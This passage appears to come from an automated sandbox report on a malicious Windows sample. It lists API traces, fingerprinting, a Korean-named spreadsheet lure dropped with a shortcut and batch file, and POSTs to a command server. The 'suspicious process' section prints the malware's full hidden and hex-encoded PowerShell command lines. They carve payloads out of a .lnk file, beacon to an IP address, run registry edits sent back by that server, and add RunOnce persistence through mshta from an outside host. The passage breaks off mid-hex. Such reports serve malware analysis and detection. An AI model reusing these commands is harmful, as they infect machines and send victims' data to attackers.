CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053caa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053caa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053caa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053caa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053caa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053caa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053caa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053caa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053caa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053cfa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053cfa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053cfa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053cfa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053cfa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053cfa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053cfa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005184c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 14, 2023, 9:04 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518580 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE}\DigitalProductID

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 14, 2023, 9:04 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header, POST method with no useragent header, Connection to IP address

suspicious_request

POST http://75.119.136.207/config/bases/config.php?U=TEST22-PC-test22-SH

Performs some HTTP requests (1 event)

request

POST http://75.119.136.207/config/bases/config.php?U=TEST22-PC-test22-SH

Sends data using the HTTP POST Method (1 event)

request

POST http://75.119.136.207/config/bases/config.php?U=TEST22-PC-test22-SH

Allocates read-write-execute memory (usually to unpack itself) (50 out of 318 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fc2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02633000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02634000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fcb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02636000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02653000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02654000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02655000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02656000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02657000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02658000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02659000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02981000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02982000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02983000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02984000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02985000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02986000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02987000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02988000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02989000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0298f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2023, 9:04 a.m.	process_identifier: 2764 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates (office) documents on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\~$현황조사표.xlsx
file	C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Aug. 14, 2023, 9:04 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000041c filepath: C:\Users\test22\AppData\Local\Temp\~$현황조사표.xlsx desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$현황조사표.xlsx create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1	0	0

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx.lnk

Creates a suspicious process (6 events)

cmdline	"C:\Windows\SysWOW64\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat
cmdline	powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = 'C:\Users\test22\AppData\Local\Temp'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk \| where-object {$_.length -eq 0x18C0000} \| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = 'C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw \| select -Skip 62464)) -Encoding Byte; & $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = 'C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj \| select -Skip 74342)) -Encoding Byte;& C:\Windows\SysWOW64\cmd.exe /c $WH9lSPHOFI;
cmdline	powershell -windowstyle hidden -command "$m6drsidu ="$jWHmcU="""53746172742D536C656570202D5365636F6E64732036373B0D0A246E76536B6C55626151203D2031303234202A20313032343B0D0A247969786773465679203D2024656E763A434F4D50555445524E414D45202B20272D27202B2024656E763A555345524E414D452B272D5348273B0D0A24615777203D2027687474703A2F2F37352E3131392E3133362E3230372F636F6E6669672F62617365732F636F6E6669672E70687027202B20273F553D27202B202479697867734656793B0D0A24624C6D6F69667148774A786845203D2024656E763A54454D50202B20272F4B734B273B0D0A696620282128546573742D506174682024624C6D6F69667148774A7868452929207B0D0A204E65772D4974656D50726F7065727479202D506174682022484B43553A5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E4F6E636522202D4E616D65204F6C6D202D56616C75652027633A5C77696E646F77735C73797374656D33325C636D642E657865202F6320506F7765725368656C6C2E657865202D57696E646F775374796C652068696464656E202D4E6F4C6F676F202D4E6F6E496E746572616374697665202D6570206279706173732070696E67202D6E2031202D772033313137313420322E322E322E32207C7C206D7368746120687474703A2F2F6269616E303135312E6361666532342E636F6D2F61646D696E2F626F6172642F312E68746D6C27202D50726F70657274795479706520537472696E67202D466F7263653B0D0A7D0D0A0D0A66756E6374696F6E207576415828245A547864482C202443725A79667375615042597A290D0A7B0D0A20202020246E464B467258484B465651726F4B203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E4765744279746573282443725A79667375615042597A293B0D0A202020205B53797374656D2E4E65742E48747470576562526571756573745D2024526E7A67717143203D205B53797374656D2E4E65742E576562526571756573745D3A3A43726561746528245A54786448293B0D0A2020202024526E7A677171432E4D6574686F64203D2027504F5354273B0D0A2020202024526E7A677171432E436F6E74656E7454797065203D20276170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564273B0D0A2020202024526E7A677171432E436F6E74656E744C656E677468203D20246E464B467258484B465651726F4B2E4C656E6774683B0D0A2020202024624C6D6F69667148774A78684555203D2024526E7A677171432E4765745265717565737453747265616D28293B0D0A2020202024624C6D6F69667148774A786845552E577269746528246E464B467258484B465651726F4B2C20302C20246E464B467258484B465651726F4B2E4C656E677468293B0D0A2020202024624C6D6F69667148774A786845552E466C75736828293B0D0A2020202024624C6D6F69667148774A786845552E436C6F736528293B0D0A202020205B53797374656D2E4E65742E48747470576562526573706F6E73655D20245845577742203D2024526E7A677171432E476574526573706F6E736528293B0D0A2020202024464F4F46467A6777564948203D204E65772D4F626A6563742053797374656D2E494F2E53747265616D526561646572282458455777422E476574526573706F6E736553747265616D2829293B0D0A2020202024624C6D6F69667148774A786845554C54203D2024464F4F46467A67775649482E52656164546F456E6428293B0D0A2020202072657475726E2024624C6D6F69667148774A786845554C543B0D0A7D0D0A646F0D0A7B0D0A202020205472797B0D0A2020202020202020246F7A69517575203D207576415820246157772027273B0D0A202020202020202049662028246F7A69517575202D6E6520276E756C6C27202D616E6420246F7A69517575202D6E65202727290D0A20202020202020207B0D0A202020202020202020202020246F7A695175753D246F7A695175752E537562537472696E6728312C20246F7A695175752E4C656E677468202D2032293B0D0A202020202020202020202020246250435A7562724A466F63203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E476574537472696E67285B53797374656D2E436F6E766572745D3A3A46726F6D426173653634537472696E6728246F7A6951757529293B0D0A20202020202020202020202069662028246250435A7562724A466F63290D0A2020202020202020202020207B0D0A2020202020202020202020202020202069662028246250435A7562724A466F632E436F6E7461696E732827726567656469743A2729290D0A202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020246D6274447643656E74784B3D246250435A7562724A466F632E537562537472696E672838293B0D0A202020202020202020202020202020202020202024436861724172726179203D246D6274447643656E74784B2E53706C697428277C7C27293B0D0A202020202020202020202020202020202020202069662028244368617241727261792E4C656E677468202D65712035290D0A20202020202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020202020204E65772D4974656D50726F7065727479202D5061746820244368617241727261795B305D202D4E616D6520244368617241727261795B325D202D56616C756520244368617241727261795B345D202D50726F70657274795479706520537472696E67202D466F7263653B0D0A202020202020202020202020202020202020202020202020244372724B684E464F4E46474B203D2027523D27202B205B53797374656D2E436F6E766572745D3A3A546F426173653634537472696E67285B53797374656D2E546578742E456E636F64696E675D3A3A555446382E47657442797465732827454F462729293B0D0A20202020202020202020202020202020202020202020202075764158202461577720244372724B684E464F4E46474B3B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A202020202020202020202020202020202020202020202020207D0D0A20202020202020207D0D0A202020207D2043617463687B7D0D0A7D7768696C65282474727565202D6571202474727565290D0A2020202053746172742D536C656570202D5365636F6E647320353B""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"
cmdline	C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$m6drsidu ="$jWHmcU="""53746172742D536C656570202D5365636F6E64732036373B0D0A246E76536B6C55626151203D2031303234202A20313032343B0D0A247969786773465679203D2024656E763A434F4D50555445524E414D45202B20272D27202B2024656E763A555345524E414D452B272D5348273B0D0A24615777203D2027687474703A2F2F37352E3131392E3133362E3230372F636F6E6669672F62617365732F636F6E6669672E70687027202B20273F553D27202B202479697867734656793B0D0A24624C6D6F69667148774A786845203D2024656E763A54454D50202B20272F4B734B273B0D0A696620282128546573742D506174682024624C6D6F69667148774A7868452929207B0D0A204E65772D4974656D50726F7065727479202D506174682022484B43553A5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E4F6E636522202D4E616D65204F6C6D202D56616C75652027633A5C77696E646F77735C73797374656D33325C636D642E657865202F6320506F7765725368656C6C2E657865202D57696E646F775374796C652068696464656E202D4E6F4C6F676F202D4E6F6E496E746572616374697665202D6570206279706173732070696E67202D6E2031202D772033313137313420322E322E322E32207C7C206D7368746120687474703A2F2F6269616E303135312E6361666532342E636F6D2F61646D696E2F626F6172642F312E68746D6C27202D50726F70657274795479706520537472696E67202D466F7263653B0D0A7D0D0A0D0A66756E6374696F6E207576415828245A547864482C2024